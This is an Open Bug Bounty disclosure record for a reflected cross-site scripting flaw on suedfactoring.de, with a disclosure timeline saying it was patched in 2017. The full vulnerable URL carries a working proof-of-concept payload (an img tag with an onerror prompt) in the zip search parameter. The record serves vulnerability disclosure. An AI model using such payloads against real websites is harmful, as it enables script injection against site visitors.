suedfactoring.de XSS vulnerability

2017-03-29T20:09:00
ID OBB:221940
Type openbugbounty
Reporter SecuNinja
Modified 2017-11-25T19:20:00

Description

Vulnerable URL:
http://www.suedfactoring.de/ansprechpartner/plz-suche/?tx_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5B__referrer%5D%5B%40extension%5D=MqContactsearchSuedleasing&tx_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5B__referrer%5D%5B%40vendor%5D=MOSAIQ&tx_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5B__referrer%5D%5B%40controller%5D=Contact&tx_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5B__referrer%5D%5B%40action%5D=searchMask&tx_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5B__referrer%5D%5Barguments%5D=YTowOnt9445ff3c2f92461be077e96183cc305ef9330b7ca&tx_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5B__referrer%5D%5B%40request%5D=a%3A4%3A%7Bs%3A10%3A%22%40extension%22%3Bs%3A26%3A%22MqContactsearchSuedleasing%22%3Bs%3A11%3A%22%40controller%22%3Bs%3A7%3A%22Contact%22%3Bs%3A7%3A%22%40action%22%3Bs%3A10%3A%22searchMask%22%3Bs%3A7%3A%22%40vendor%22%3Bs%3A6%3A%22MOSAIQ%22%3B%7Df04a72578ff2b5705e20438db75c1253e81f7261&tx_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5B__trustedProperties%5D=a%3A2%3A%7Bs%3A9%3A%22zipSearch%22%3Ba%3A1%3A%7Bs%3A3%3A%22zip%22%3Bi%3A1%3B%7Ds%3A6%3A%22search%22%3Bi%3A1%3B%7D51c936c7da1c83c11cba936403c9d901fa4c4305&tx_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5BzipSearch%5D%5Bzip%5D=a%3E%27%3E%22%3Etr%3Ci%3Ep%3Cimg+src%3Dy+onerror%3Dprompt%28%2Fopenbugbounty%2F%29%3E&tx_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5Bsearch%5D=

Details:

Property| Value
---|---
Patched:| Yes, on 25.11.2017
Latest check for patch:| 25.11.2017 19:20 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| 15773749
VIP website status:| No
SSL connection check (suedfactoring.de):| Grade A

Coordinated Disclosure Timeline:

Event| Time
---|---
Vulnerability submitted via Open Bug Bounty| 29 March, 2017 20:09 GMT
Generic security notifications sent to website owner| 29 March, 2017 20:12 GMT
Vulnerability details disclosed by researcher| 26 April, 2017 20:16 GMT
Vulnerability patched by the website owner| 25 November, 2017 19:20 GMT